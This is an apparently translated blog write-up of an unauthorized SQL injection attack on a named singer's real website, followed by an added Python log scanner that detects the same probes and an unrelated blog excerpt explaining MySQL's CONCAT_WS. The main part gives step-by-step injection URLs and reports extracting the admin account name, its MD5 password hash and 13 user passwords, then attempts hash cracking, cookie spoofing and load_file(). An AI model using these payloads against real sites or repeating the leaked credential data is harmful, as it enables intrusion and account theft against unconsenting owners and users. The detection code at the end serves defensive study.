An Incomplete Assessment of Wang Leehom's Website

Author: yexusky

PS: I did not get a shell, but I gained a little understanding of detecting fields in PHP injection.

URL: http://www.wangleehom.com

Blind SQL INJ: http://www.wangleehom.com/forum/view?id=5047
http://www.wangleehom.com/forum/view?id=5047 and 1=1 (no error)
http://www.wangleehom.com/forum/view?id=5047 and 1=0 or 1=2 (error) > clearly a PHP injection
http://www.wangleehom.com/forum/view?id=5047 order by 11 returns normally
http://www.wangleehom.com/forum/view?id=5047 order by 12 errors (Unknown column '12' in 'order clause'
SELECT * FROM forum_detail WHERE forum_id = 5047 order by 12/* ORDER BY id)
So the column count is 11, go
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,5,6,7,8,9,10,11/*
Returns 1,4,5,6,11; then, at position 5, insert CONCAT_WS(CHAR(32,58,32),user(),database(),version())
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11/*
Returns (demo@localhost : wang_new : 4.1.22-log)
From the database, detected (user,config)
The user table has (id,password,*) plus one more column I could not guess. I thought about it for a long time, then tried looking for the admin address: http://www.wangleehom.com/admin/
It was very easy to guess, so I looked at the source

<html>
<head>
<title>Webtaiwan Website Management Suite</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style>
input.text {
font-family: "Arial", "Helvetica", "sans-serif"; font-size: 9pt; color: #666666; height: 22px}
</style>
<script language="javascript" src="../func.js"></script>
<script language="JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && document.getElementById) x=document.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<script language="javascript">
function checkLogin()
{
if (checkBlank(frm.account, '請輸入帳號!'))
return false;
if (checkBlank(frm.password, '請輸入密碼!'))
return false;
return true;
}
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('images/arrow_n.gif')">
<form name="frm" method="post" action="index.php?fn=login" style="margin:0 0 0 0;" onSubmit="return checkLogin();">
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td bgcolor="#DFE0E0" height="87"><img src="../images/admin/spacer.gif" width="20" height="87"></td>
</tr>
<tr>
<td bgcolor="#C0C0C0" height="1"><img src="../images/admin/spacer.gif" width="20" height="1"></td>
</tr>
<tr>
<td valign="bottom">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="161" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_logo.gif" width="161" height="87"></td>
</tr>
<tr>
<td><img src="../images/admin/index_1.gif" width="161" height="36"></td>
</tr>
</table>
</td>
<td width="317" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_2.gif" width="317" height="87"></td>
</tr>
<tr>
<td><img src="../images/admin/index_3.gif" width="317" height="55"></td>
</tr>
</table>
</td>
<td valign="top" width="239">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/admin/index_3_coname.gif" width="239" height="100"></td>
</tr>
<tr>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#ADADAD" height="76">
<tr>
<td align="center" colspan="2"><img src="../images/admin/spacer.gif" width="10" height="4"></td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_username.gif" width="69" height="11"></td>
<td>
<input class="text" type="text" name="account" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_password.gif" width="69" height="11"></td>
<td>
<input class="text" type="password" name="password" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" colspan="2"><img src="../images/admin/spacer.gif" width="10" height="4"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="87">&nbsp;</td>
</tr>
<tr>
<td bgcolor="#3891CB"><img src="../images/admin/spacer.gif" width="20" height="7"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="4" valign="top"><img src="../images/admin/spacer.gif" width="20" height="20"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#C0C0C0" height="1"><img src="../images/admin/spacer.gif" width="20" height="1"></td>
</tr>
<tr>
<td background="../images/admin/indx_line_bg.gif" height="25"><img src="../images/admin/indx_line.gif" width="778" height="25"></td>
</tr>
<tr>
<td bgcolor="#DFE0E0" height="32"><img src="../images/admin/spacer.gif" width="20" height="32"></td>
</tr>
<tr>
<td height="96" bgcolor="#DFE0E0" valign="top">
<table width="717" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="578" align="right" class="message_error" valign="bottom"><!--error
message area, error message area, error message area, error message
area--></td>
<td width="25">&nbsp;</td>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="65"><img name="arrow" border="0" src="../images/admin/arrow_o.gif" width="65" height="25"></td>
<td><input type="image" src="../images/admin/login.gif" width="74" height="25" name="login" border="0" onLoad="" onMouseOver="MM_swapImage('arrow','','../images/admin/arrow_n.gif',1)" onMouseOut="MM_swapImage('arrow','','../images/admin/arrow_o.gif',1)"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table></form>
</body>
</html>


Searched for input and found <input class="text" type="text" name="account" style="width:90px;">
</td>
</tr>
<tr>
<td align="center" width="90"><img src="../images/admin/indx_password.gif" width="69" height="11"></td>
<td>
<input class="text" type="password" name="password" style="width:90px;">
At a glance it was obvious why the username column could not be guessed: it is name="account", account, that's it. I was a little pleased,
http://www.wangleehom.com/forum/view?id=5047%20and%2...,2,3,4,CONCAT_WS(CHAR(32,58,32),id,account,password),6,7,8,9,10,11%20from%20user/*
Got the admin user, password and id (1 : wangmama : 44a519446ffb8f385a6dedf9ee1fb69a

Then went to www.cmd5.com and www.xmd5.org, but neither could crack it, sigh. Then kept guessing tables and guessed config, but it only has id (99)
Then tried cookie spoofing to get into the admin backend; that did not work, so no way in. It turned out the path was even disclosed (/var/www/hosts/wangleehom.com/)
Oh right, load_file() could not read anything at all, ugh. Finally, detected 13 user passwords in the current database
OK, the test ends here
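As an added, defender-side illustration that is not part of the original write-up, the following Python scans web-server access-log lines for the probing sequence described above (the boolean test, ORDER BY column counting, a UNION SELECT column list carrying CONCAT_WS(CHAR(...)), load_file() and a trailing /* terminator) and also applies the root-cause check that forum/view?id= should be an integer. The log lines, client IP and timestamps are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic) replaying the probing
# sequence in the write-up: a normal request, the boolean test, ORDER BY column
# counting, and a UNION SELECT carrying CONCAT_WS(CHAR(...)).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:10:00:00 +0800] "GET /forum/view?id=5047 HTTP/1.1" 200 8120
10.0.0.5 - - [01/Jan/2009:10:00:03 +0800] "GET /forum/view?id=5047%20and%201=0%20or%201=2 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2009:10:00:09 +0800] "GET /forum/view?id=5047%20order%20by%2012 HTTP/1.1" 500 298
10.0.0.5 - - [01/Jan/2009:10:00:15 +0800] "GET /forum/view?id=5047%20and%201=2%20union%20select%201,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11/* HTTP/1.1" 200 8200
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Each signature matches one step of the write-up, applied to the URL-decoded value.
SIGNATURES = [
    ("boolean-test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I)),
    ("order-by-column-count", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("concat_ws-char", re.compile(r"\bconcat_ws\s*\(\s*char\s*\(", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("comment-terminator", re.compile(r"/\*\s*$")),
]

def analyze_query(target):
    """Return {param: [labels]} for one request target; parse_qs URL-decodes values."""
    findings = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            hits = [label for label, rx in SIGNATURES if rx.search(value)]
            # forum/view?id= must be an integer: a non-numeric value is the
            # root-cause signal even when no keyword signature fires.
            if name == "id" and not value.strip().isdigit():
                hits.append("id-not-integer")
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings

def scan_log(text):
    """Return [(line_no, http_status, findings)] for every flagged log line."""
    flagged = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m:
            findings = analyze_query(m.group("target"))
            if findings:
                flagged.append((line_no, int(m.group("status")), findings))
    return flagged
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 4 and leaves the plain id=5047 request alone; the 500 statuses next to the ORDER BY and boolean probes are the same error signal the write-up relied on.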


Usage of CONCAT_WS

Source: 火车头's Blog

I needed to take N fields from the database and display them joined together with "," as the separator. At first I thought of using CONCAT(), which was quite a hassle; I did not expect the manual to mention CONCAT_WS(), which is very convenient.
CONCAT_WS(separator, str1, str2,...)
It is a special form of CONCAT(). The first argument is the separator for the remaining arguments. The separator can be a string, just like the remaining arguments. If the separator is NULL, the return value is also NULL. The function skips any NULL and empty strings after the separator argument. The separator is added between the strings being concatenated.
A simple example:

mysql> SELECT CONCAT_WS(",","First name","Second name","Last Name");
-> 'First name,Second name,Last Name'
mysql> SELECT CONCAT_WS(",","First name",NULL,"Last Name");
-> 'First name,Last Name'